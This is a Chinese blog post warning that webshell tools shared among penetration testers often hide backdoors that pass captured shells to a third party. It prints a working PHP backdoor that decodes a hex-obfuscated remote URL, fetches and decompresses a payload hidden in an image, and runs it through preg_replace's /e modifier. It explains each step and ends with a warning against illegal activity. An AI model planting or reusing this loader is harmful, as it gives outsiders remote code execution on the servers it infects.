在一些滲透測試中，往往會用到各種大馬，小馬，一句話，菜刀等等……但是你們有想過這些工具會存在后門嗎？

何為webshell

webshell的獲取一般要跟大馬小馬這些掛上一個√(就算是命令執行也需要shell)。webshell簡單理解就是網站的一個管理程序，可以上傳下載等等一系列操作，而大小馬則是這個管理程序的代碼。

關于后門

一般存在后門的話，所獲得的shell會通過后門發送給箱子，那個箱子就是用來裝shell的地方！

舉個例子

<?php

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

這里我們主要看

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

這串代碼看起來可能平平無奇，但是執行過后其實是一張箱子的圖片地址，這個地址我就不放出來了，有興趣的可以自己搭建解密！這個圖片還需要調用file_get_contents函數讀取圖片為字符串，然后substr取3649字節之后的內容，再調用gzuncompress解壓，得到真正的代碼。最后調用preg_replace的修飾符e來執行惡意代碼。然后，shell就被裝進箱子里了。

黑吃黑是怎么形成的

其實網絡安全圈子里定義一直模糊，有人兢兢業業挖洞，做src；有人背地里干違法勾當，賺黑心錢。天天在群里秀，挖洞的一部分人就會想

同樣是技術，那憑什么我的付出和收入沒有他做一單高？就受不住誘惑投入黑產了。殊不知在群里秀的那群人，早已喝茶去了……

極少數違法分子就覺得自己挖太危險了，重新換個思路:

提供大小馬之類的工具，再寫上一句免責聲明，加個后門，想著坐等shell進賬出售，出了事也不會被追究。畢竟后門代碼一般小白還真不會去管，他們膽子大，技術差。這里奉勸萌新小白們別做事不經大腦思考，盲目炫技最后只能進去喝透心涼茶?。。?/h1>

這伙人寫好了后門，瘋狂推廣，進賬，然后被抓…

“違法犯罪得事一定不能做！”